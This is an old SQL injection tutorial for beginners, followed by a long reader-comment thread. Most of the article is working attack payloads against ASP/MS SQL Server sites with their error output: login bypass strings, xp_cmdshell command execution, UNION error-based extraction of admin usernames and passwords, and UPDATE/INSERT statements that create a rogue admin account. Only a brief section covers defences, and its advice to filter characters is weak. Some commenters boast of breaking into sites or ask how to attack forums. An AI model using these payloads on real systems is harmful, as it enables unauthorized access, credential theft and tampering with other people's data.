|
|
| |
| The following article will try to help beginners with grasping the problems facing them while trying to utilize SQL Injection techniques, to successfully utilize them, and to protect themselves from such attacks. |
| |
Credit:
The information has been provided by SK.
|
| |
1.0 Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.
This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.
1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
1.2 What do you need?
Any web browser.
2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise).
2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
http://duck/index.asp?id=10
3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get login without any login name or password.
3.1 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
4.0 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.
6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".
6.1 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".
6.3 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.
To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.
7.0 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
8.0 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
9.0 Where can I get more info?
One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
Great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
A good summary of SQL Injection on various SQL Server on
http://www.owasp.org/asac/input_validation/sql.shtml
Senseport's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm
Other worth readings:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
|
| Subject:
|
Good |
Date: |
24 Oct. 2005 |
| From: |
pawankumar2k1 at yahoo dot com |
| This was a good topic, but this topic lack, if developers have applied the security measures for SQL Injection, than how we injects SQL queries into web-applicatios |
|
| Subject:
|
Usefull Information |
Date: |
27 Oct. 2005 |
| From: |
anon. |
| This guide is very useful information. |
|
| Subject:
|
smart |
Date: |
9 Nov. 2005 |
| From: |
ntnijeeshyahoo.com |
| this was a smart topic.But as a developer i wand to learn more how to tighten the security of my applications against the injection
|
|
| Subject:
|
uhh... you dont |
Date: |
11 Nov. 2005 |
| From: |
anon. |
| If developers have applied the security measures to prevent SQL injection, then you can't inject SQL queries. It's something completely preventable by good coding practice and usually only is allowed when the developer is being lazy or sloppy. |
|
| Subject:
|
for php and mysql |
Date: |
15 Nov. 2005 |
| From: |
just me |
There is a nice article, that comes with a working solution for php+mysql injection.
http://www.askbee.net/articles/php/SQL_Injection/sql_injection.html |
|
| Subject:
|
Another discussion |
Date: |
21 Nov. 2005 |
| From: |
Andrew |
| I discuss this subject with a basic introduction to SQL at the following address: http://andrew.absurdlycool.com/class/l7.html |
|
| Subject:
|
Usefull Information |
Date: |
5 Dec. 2005 |
| From: |
Janner Simarmata |
| This was a good topic, but this topic lack, if developers have applied the security measures for SQL Injection, than how we injects SQL queries into web-applicatios |
|
| Subject:
|
twisted metal |
Date: |
5 Dec. 2005 |
| From: |
Animemouse |
| although the developers have applied the security measure we still can swift the code to the other angle..just be creative...but it will take time though |
|
| Subject:
|
very good one |
Date: |
7 Dec. 2005 |
| From: |
eby |
| This is an excellent article. thanks a lot |
|
| Subject:
|
Good article but... |
Date: |
16 Dec. 2005 |
| From: |
shareefer |
Great article, except for one thing. As a matter of prevention, you should ALWAYS use stored procedures in your web code.
stored procedures interpret there parameters literally even if they contain SQL code. so all SQL injections are blocked... simple as that. no need for checking for dashes, quotes, SQL key words, ect. |
|
| Subject:
|
What The Doors Locked |
Date: |
26 Dec. 2005 |
| From: |
Dark Pontifex |
| Great Article For SQL Injection |
|
| Subject:
|
good for beginners |
Date: |
27 Dec. 2005 |
| From: |
la |
| A good beginning to understand. Thanks. |
|
| Subject:
|
good information |
Date: |
29 Dec. 2005 |
| From: |
sponsbobspyahoo.com |
good tutorial,
thank you |
|
| Subject:
|
Thank you for the information |
Date: |
4 Jan. 2006 |
| From: |
Padrino123 |
| This article really help me. Thanks for the information. |
|
| Subject:
|
Really Nice article |
Date: |
9 Jan. 2006 |
| From: |
Uppalapati Giri Prasad |
| This article is realy clear enough to understand the concept and rich in information to impleament an example.Thanks of publishing such a good article. |
|
| Subject:
|
quite well |
Date: |
18 Jan. 2006 |
| From: |
rajgremo_u_rajyahoo.com |
| This is well architectued data...............thnak you for giving data |
|
| Subject:
|
Stored Procs are not guaranteed protection |
Date: |
18 Jan. 2006 |
| From: |
dbjstein |
| In response to the note above, it is not I believe the case that stored procedures prevent SQL injection in all cases. Stored procedures are frequently set up to contain dynamic SQL, where the statement is constructed at runtime. In those cases, there is no precompiled statement, and therefore no prevention of SQL injection techniques. Only if the stored procedure contains a defined SQL statement with bind variables or parameters to be parsed into the statement, will it prevent SQL injection. |
|
| Subject:
|
Is it possible!! |
Date: |
19 Jan. 2006 |
| From: |
Deepak |
| SQL Injection is not possible in stored procedures...so it is the easiest way to prevent sql injection...Is any type of hacking possible, when using stored procedures?!! |
|
| Subject:
|
Very good article |
Date: |
19 Jan. 2006 |
| From: |
Deepak |
| It's a very nice article and expecting more like this...
|
|
| Subject:
|
very good topic to read |
Date: |
19 Jan. 2006 |
| From: |
prashant |
| It is useful to teach about what is SQL Injection. |
|
| Subject:
|
say so.. |
Date: |
21 Jan. 2006 |
| From: |
Burner |
this article is so usefull especially who are new about appl. developing, database designing, database admins, webserver admins,...etc and of course it is remainder for all of us but there is a problem about the bad users that they can use this information to launch attacks against certain places,
so this type of articles one way is good, one way is bad....
Should we put this kind of information on publick sites????
thanks |
|
| Subject:
|
Good Article |
Date: |
24 Jan. 2006 |
| From: |
Bob |
This is one of the best article i have ever seen about SQL Injection.........
But, in one way I do accept with burner whether to keep these sort of articles in public sites.. |
|
| Subject:
|
Why hide them from public eyes |
Date: |
29 Jan. 2006 |
| From: |
Dogman |
These things shouldn't be hidden from public eyes. There are a lot of developers that never heard about this concept and are writing injectable web applications. Also.. there are a lot of people that are using those applications.. This is a very good material and every developer should read it. Also every developer should read about securing their applications. Too bad they don't. I've met people with much more experience than me sustaining that stored procs are slower than calling the query straight from your application and so on..
I hope you all got my point. |
|
| Subject:
|
good |
Date: |
2 Feb. 2006 |
| From: |
alir9 |
| Today , we have some web applications that they don't patch 'or' in login page !!! this article was good but there is some different between ms-sql and mysql and no one explained ! |
|
| Subject:
|
great job dude |
Date: |
4 Feb. 2006 |
| From: |
Kevo |
| I really enjoyed reading this a lot thanks man!!1 |
|
| Subject:
|
none |
Date: |
9 Feb. 2006 |
| From: |
anon |
| With login pages don't most people store encrypted passwords using some sort of server side funtion to decrypt or compare? how would injection get past that for logging in? just curious because I tried the stuff in this article and wasn't able to login to a site I run, but i would like to fix the hole if this is still possible another way. |
|
| Subject:
|
Variance in SQL server error messages |
Date: |
10 Feb. 2006 |
| From: |
redeye |
I tried testing this on a site, using something similar to:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Instead of the useful
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
I get this:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting character string to smalldatetime data type.
/titlenews.inc, line 46
Is this a newer version of SQL server or a differently configured one, one which deliberately does not output the useful data? |
|
| Subject:
|
bind variables |
Date: |
10 Feb. 2006 |
| From: |
seph |
How is using a stored procedures going to prevent this?
... you just need to make sure you use bind variables. |
|
| Subject:
|
great but much brief |
Date: |
14 Feb. 2006 |
| From: |
neido |
| yeah it contains cool stuff but u have to make it more user friendly then this. |
|
| Subject:
|
COMMON |
Date: |
15 Feb. 2006 |
| From: |
hay |
| this trick is common i should find the better ones
|
|
| Subject:
|
SQL injection sux |
Date: |
21 Feb. 2006 |
| From: |
White HaCker |
I prefer LKM rootkit attacks for sun servers .
This could be used as a kernel hackin trick .
Just like the way i used to code buffer over flows for unix servers ... |
|
| Subject:
|
Php injection |
Date: |
22 Feb. 2006 |
| From: |
whisker |
Any php site fallen for SQL Injection , i read an article that only .asp and .cfm will fall easily
for SQL Injection ..let me know some comments on this ..if any one did SQL Injection on PHP Site please let me know i have fallen many asp sites with SQL injection . |
|
| Subject:
|
devakishore at yahoo.com |
Date: |
22 Feb. 2006 |
| From: |
etterdev |
we can know wheather the site is vulnerable to sql injection or not by the way they handle the errors ..but how to know which backend database the site is running is there any tool
for knowing that . |
|
| Subject:
|
nice article to get to know SQL injection |
Date: |
3 Mar. 2006 |
| From: |
Ashvinbodhale |
The attack can b foiled by already developed apps n also stored procs that are embedded inside code--- all works well.
chk this URL...http://www.askbee.net/articles/php/SQL_Injection/sql_injection.html |
|
| Subject:
|
Nice tutorial |
Date: |
7 Mar. 2006 |
| From: |
cream_shady4uyahoo.com |
| The tutorial fairly teaches hacking through sql injection and preventive measures but what if web applications running another application different from sql server ? |
|
| Subject:
|
Nice tutorial |
Date: |
10 Mar. 2006 |
| From: |
cream_shady4uyahoo.com |
| The tutorial fairly teaches hacking through sql injection and preventive measures but what if web applications running another application different from sql server ? |
|
| Subject:
|
works on any database |
Date: |
10 Mar. 2006 |
| From: |
Spotty-faced Git |
| This is an attack that works on any database backend, not just SQL Server. You just have to replace the INFORMATION_SCHEMA table names with the appropriate system table names for the product you are working against. A SQL Injection attack is a result of manipulating the standard SQL query language (used by nearly all DB products), and bad coding practices by the web developer. It's completely DB agnostic at its basic level. |
|
| Subject:
|
how du u use this |
Date: |
12 Mar. 2006 |
| From: |
oLi |
| i tried to use this on a forum and it did nothing???? |
|
| Subject:
|
what about this solution |
Date: |
15 Mar. 2006 |
| From: |
da_man |
I tested a forum made by a friend and his login looked kinda like this (shortened down a bit):
$query_1 = mysql_query("e;SELECT * FROM "e;.$tpref."e;users WHERE UserName = '$_POST[usern]' AND PassWord = '$_POST[passwd]'"e;);
//check login
if (mysql_num_rows($query_1) == 1){
|
|
| Subject:
|
what about this solution |
Date: |
15 Mar. 2006 |
| From: |
da_man |
I tested a forum made by a friend and his login looked kinda like this (shortened down a bit):
$query_1 = mysql_query("e;SELECT * FROM "e;.$tpref."e;users WHERE UserName = '$_POST[usern]' AND PassWord = '$_POST[passwd]'"e;);
//check login
if (mysql_num_rows($query_1) == 1){
// do login stuff
} else {
// print error msg
}
how safe is that against sql injection? |
|
| Subject:
|
Not very safe... |
Date: |
21 Mar. 2006 |
| From: |
Nick Goloborodko |
At the very least that you need to do is to check for the input, and escape/remove all of the SQL special characters. Also, consider using SPs
Kind reagrds,
Nick Goloborodko |
|
| Subject:
|
Very Rich in Knowledge - Really Interesing |
Date: |
21 Mar. 2006 |
| From: |
Jabir Hussain |
| This is really rich in knowledge. It helped me a lot to secure my applications |
|
| Subject:
|
interesting |
Date: |
29 Mar. 2006 |
| From: |
pro |
| definitly makes you hungry for more information. I wonder where you could get a class in these techniques? |
|
| Subject:
|
this is my query...what can u send in the user name or password the inject this |
Date: |
30 Mar. 2006 |
| From: |
Elad |
strsql = "e;SELECT username, password "e; +
"e;FROM Agents "e; +
"e;WHERE (username = N'"e; + _UserName.ToString() + "e;') AND (password = N'"e; + _Password + "e;')"e;;
|
|
| Subject:
|
table names corresponding to different db |
Date: |
8 Apr. 2006 |
| From: |
sumit |
can u tell me what are the different system table names in context of different sql server.
eg. what do i replace INFORMATION_SCHEMA.TABLES in mysql server?
Thanks
|
|
| Subject:
|
what is the work of rank in sql injection |
Date: |
14 Apr. 2006 |
| From: |
anobscase |
| i just want to know the work of rank in sql injection |
|
| Subject:
|
Cool Stuff |
Date: |
5 May 2006 |
| From: |
Anand |
| Good Help ..for beginners....as a developer or security guy . |
|
| Subject:
|
:- |
Date: |
8 May 2006 |
| From: |
__ThE_BiG_DoG__ |
| i get all that stuff and i found out u can use perl to acess the codes of sql into sites but...i cant work out how 2 se that :-s any advice |
|
| Subject:
|
:) waw |
Date: |
12 May 2006 |
| From: |
_Mt_DB_ |
| i think this is a good information for security
|
|
| Subject:
|
With access DB |
Date: |
17 May 2006 |
| From: |
tieulongnuxinh |
I can't do it with access db:
Microsoft JET Database Engine error '80004005'
Could not find file 'c:\windows\system32\inetsrv\INFORMATION_SCHEMA.mdb'.
/aboutus_content.asp, line 18
|
|
| Subject:
|
(,) |
Date: |
17 May 2006 |
| From: |
wala lang |
| thank you |
|
| Subject:
|
What about... |
Date: |
18 May 2006 |
| From: |
ho |
| sql interjections? Are they as bad or can we just kinda ignore them? |
|
| Subject:
|
GoOD Article.. |
Date: |
22 May 2006 |
| From: |
Kumarkumskumar_005yahoo.com |
Hai,
This Is one of the Good Article which i found. I hope All Developers should read this Article.
May i expect some more SQL Injection with example.. |
|
| Subject:
|
Wonderfull artical |
Date: |
5 Jun. 2006 |
| From: |
Dev |
| Fine Article for the beginners... |
|
| Subject:
|
Good one |
Date: |
6 Jun. 2006 |
| From: |
Kalyani |
| Good article!!
|
|
| Subject:
|
Good Article |
Date: |
8 Jun. 2006 |
| From: |
Ramzan |
| Best Article, but i think this should be hidden from Mischivious People. |
|
| Subject:
|
Excellent! |
Date: |
8 Jun. 2006 |
| From: |
israelagnouhyattarahotmail.com |
| It's a shame not too many PHP+SQL admins limit how the client manipulates DBase data through injections. They worry too much about patching applications (which is not bad), but they should also consider focusing on these attacks, as they have proven to be extremely handy when everything is patched up. |
|
| Subject:
|
Cool Stuff |
Date: |
13 Jun. 2006 |
| From: |
habib.khalidhotmail.com |
| It's a nice article for every web developer,they should take care of SQL injection in order to improve better security. |
|
| Subject:
|
what about pot 443 |
Date: |
20 Jun. 2006 |
| From: |
Jeffro |
| Would this work the same if you were utilizing port 443 vs port 80??? |
|
| Subject:
|
Really Interesing!!!!!! |
Date: |
21 Jun. 2006 |
| From: |
skjha2000rediffmail.com |
Really interesting and helpful topic for web base application testing.
Regards,
Subodh Kumar Jha
Associate ?Test Engineer,
Aftek Infosys Ltd. +919823282061
|
|
| Subject:
|
Cool Stuff |
Date: |
29 Jun. 2006 |
| From: |
Jasthi Adi Vishnu Murthy |
| Interesting and helpful topic on Replication |
|
| Subject:
|
Really Interesting |
Date: |
6 Jul. 2006 |
| From: |
Somesh |
| Interesting and helpful topic for web base application testing. |
|
| Subject:
|
hello... |
Date: |
7 Jul. 2006 |
| From: |
Renu |
Hello there ..
this article is really much helpfulldespite of studying this concept very first time i got clear with this upto very much extent....But being a s/w tester i must know this concept
in detail. whatever projects i am working currently on, i am using VB.NET , ASP.NET &sql server tech So could any one of u tell me how it affects with this combination?? what are the things i have to test for incase of SQL security?? |
|
| Subject:
|
Best Write Up to Date |
Date: |
7 Jul. 2006 |
| From: |
UtmostBastard |
| Kudos to the author/s. This is by far the most in depth write up I have read. Thanks for taking the time to put this out!! |
|
| Subject:
|
HEllo there....... |
Date: |
8 Jul. 2006 |
| From: |
Renu |
HEllo there,
i have gone through this article & it's really helpful . But i do have one question,
if im using .net & SQL server tech. that time what kind of things i have to test for
from security point of view?? if possible please ans be back.....im workig with web applications using ASP.net
|
|
| Subject:
|
good article |
Date: |
13 Jul. 2006 |
| From: |
amoogye |
| it was good article to read. thank you |
|
| Subject:
|
I highly suggest you watch this video... |
Date: |
14 Jul. 2006 |
| From: |
Ralph |
I found this BLOG which has some SQL Injection info, along with a link of a video where a guy uses SQL injection to replace a logging dll on a webserver and captures credit card information.
Anyone who thinks this is no big deal needs to watch. Goto this URL and then look for the video link.
http://devauthority.com/blogs/jwooley/archive/2006/07/11/1672.aspx
|
|
| Subject:
|
nothing worked |
Date: |
17 Jul. 2006 |
| From: |
V8 |
| I'm using PHP/MySQL for some time now and i am used to filter user input but when I found this article I tried some of the injections on my server and none of them worked. Sorry. |
|
| Subject:
|
stored procedure |
Date: |
24 Jul. 2006 |
| From: |
Ivan |
| Stored procedures are not always safe because they construct a sql statement at runtime pretty much the same way as a program would. It is possible, however, that arguments are being passed to a stored procedure at runtime and that the actual SQL statement doesn't contain the arguments. There are sites which explain how to do this in SQL Server. |
|
| Subject:
|
jim |
Date: |
1 Aug. 2006 |
| From: |
jim.scuba.kennedygmail.com |
Very scary that people think the use of stored procs will protect them from sql injection. (or the use of a particular web or RDBMS technology)
Folks, USE BIND VARIABBLES. Don't allow dynamic SQL. If you want to use stored procs that is fine, but your stored procs better NOT use dynamic sql. This problem isn't soley a windows/sql server problem; it can appear on any db server and any OS with any language of you do it right. (wrong) Again use bind variables. Also bind variables scale better. |
|
| Subject:
|
the .NET tech |
Date: |
4 Aug. 2006 |
| From: |
Aaron |
| the .NET tech protect from malicious code in any inputs. The better option for security is the .NET development. |
|
| Subject:
|
Good reading |
Date: |
10 Aug. 2006 |
| From: |
Elijah Daniel |
This is very informative and a recommended reading.
Keep it up! |
|
| Subject:
|
very nice |
Date: |
16 Aug. 2006 |
| From: |
EtHeReAl |
really very nice article for newbies and experts
thx very much |
|
| Subject:
|
hello |
Date: |
16 Aug. 2006 |
| From: |
pls how can i find HTML source code of ulr |
| pls how can i find HTML source code of ulr |
|
| Subject:
|
my way |
Date: |
27 Aug. 2006 |
| From: |
felpharyahoo.com |
| Ya don't execute the code if contains ; / \ ' "e; = - is that simple. Why does anybody trye to comlicate it???? |
|
| Subject:
|
my way |
Date: |
7 Sep. 2006 |
| From: |
Libstar |
Not that simple felpharyahoo.com!! What if user requirement is to enter a string including one of these charaters? ; / \ ' "e; = - (e.g. surname O'Neill which includes an apostrophe)
You gonna tell your client they can't have what they need? They gonna tell ya, you're not getting paid!!! |
|
| Subject:
|
to the person above me |
Date: |
8 Sep. 2006 |
| From: |
LostDreamer |
Well, if you do not execute any sql query containing those digits, how would one make a forum ? or any place where people can post messages ?
when they use a word with a ' in it, the code would not execute the insert query .....
Also good option against SQL Injection is Magic Quotes.... replaces all the ' & "e; with ' & \"e; which would not end / alter the SQL query. |
|
| Subject:
|
Very useful article, but... |
Date: |
15 Sep. 2006 |
| From: |
iframe srcfileciframe |
| What about Cript() and Decript() functions? for numbers we haven't problem. If they are strings we can Cript and Decript data using an easy algorithm or we can restrict string value only if contains 1234567890ABCDEFG characters. |
|
| Subject:
|
The grammar in this article is horrific! |
Date: |
21 Sep. 2006 |
| From: |
I dont have time for this... |
| Seriously, proofread your pages. |
|
| Subject:
|
languagelibrary problem |
Date: |
23 Sep. 2006 |
| From: |
gaba |
Frankly people, this is rediculous. You folks should start getting on at your language designers to do things properly so this stuff is not a problem.
The only problem here is that data passed to SQL does not have 'special' characters quoted before it gets to the query.
You should be able to do this manually. However, you should be given library functions that automatically do this for you.
searchfor="e;myid"e;;
query="e;select * from table where id=?"e;;
executequery(query, searchfor);
If the execute query function autmatically removes all SQL injection problems, this is a non-issue.
I consider it a fatal language flaw not to have such a library issued as the standard database implementation. |
|
| Subject:
|
Seriosuly Lacking |
Date: |
24 Sep. 2006 |
| From: |
Rust |
So it's easy to see that this article is good information for the fledgling cracker out there, but what about sysadmins? There's a hundred lines on how to f*ck the system, but only 3 useful lines on how to prevent it.
Obviously, any competent server admin will have hardened his system, but what about all the developers out there? If they filter out "e;single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc"e;, what are they replaced with? A single-quote is easy to replace with two single-quotes (which are stored in the database as a single quote), but does that work for the rest? Nope.
Sorry folks, but this article is only useful to crackers and server ad | |
